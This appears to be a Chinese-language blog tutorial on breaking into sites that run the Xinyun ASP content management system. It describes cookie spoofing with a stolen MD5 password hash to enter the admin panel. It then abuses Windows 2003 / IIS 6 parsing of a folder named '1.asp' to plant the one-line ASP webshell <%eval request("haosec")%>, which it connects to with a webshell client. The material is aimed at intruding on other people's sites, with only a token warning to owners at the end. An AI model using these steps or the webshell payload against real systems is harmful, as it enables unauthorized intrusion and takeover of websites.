新云网站管理系统后台拿WEBSHELL

  新云网站管理系统是现在比较流行的cms系统,功能也算强大,但由于ASP语言本身的安全环境不是很好,所以漏洞多多也不新鲜,我这里一共发现了两个安全隐患,应该说是致命的。

  一、COOKIES欺骗,进入后台。

  大家都知道,一般的后台密码都是MD5加密的,如果管理员把密码设置的复杂一点,即使你在聪明,恐怕也要用个一年半载才能破解出来,但其实,新云的后台只要知道MD5的值就可以进入,这也是一般的ASP程序经常有的情况。

  方法就是在本地搭设一个相同版本的新云站点,然后用COOKIES修改浏览器,先进入本地的新云管理后台,然后修改COOKIES ,将账号、密码、网址都改成待入侵网站的就可以了,一回车,你就会发现我们已经成功的进入了待入侵网站的后台。

  这个方法比较简单,也常见,我就不多说了,我的是下面的后台如何取得WEBSHELL.

  二、后台拿WEBSHELL(系统2003)

  我们点击模板管理,新建一个模板,名称随便,但注意模板路径一定要是"1.asp"这类,因为2003会把1.asp解析成为文件夹,新建完成之后我们会看到网站根目录下面会生成一个1.asp的文件夹,这时我们点击编辑CSS样式,我们将整个代码都用<%eval request("haosec")%>替换掉,然后点击保存。

  这时你会发现,在1.asp文件夹下面会新建一个文件style.css,里面的内容就是一句话了。我们将http://my/1.asp/style.css用LACKER2一句话进行连接,可以看到已经连接成功。

  这样我们就得到了一个WEBSHELL。

  其实漏洞形成的原因无非就是过滤不严密造成的,使用新云的朋友一定要保护好数据库和后台,否则你就惨喽。

 

上一篇:安卓防火墙 PS DroidWall

下一篇:Wireshark基本介绍和学习TCP三次握手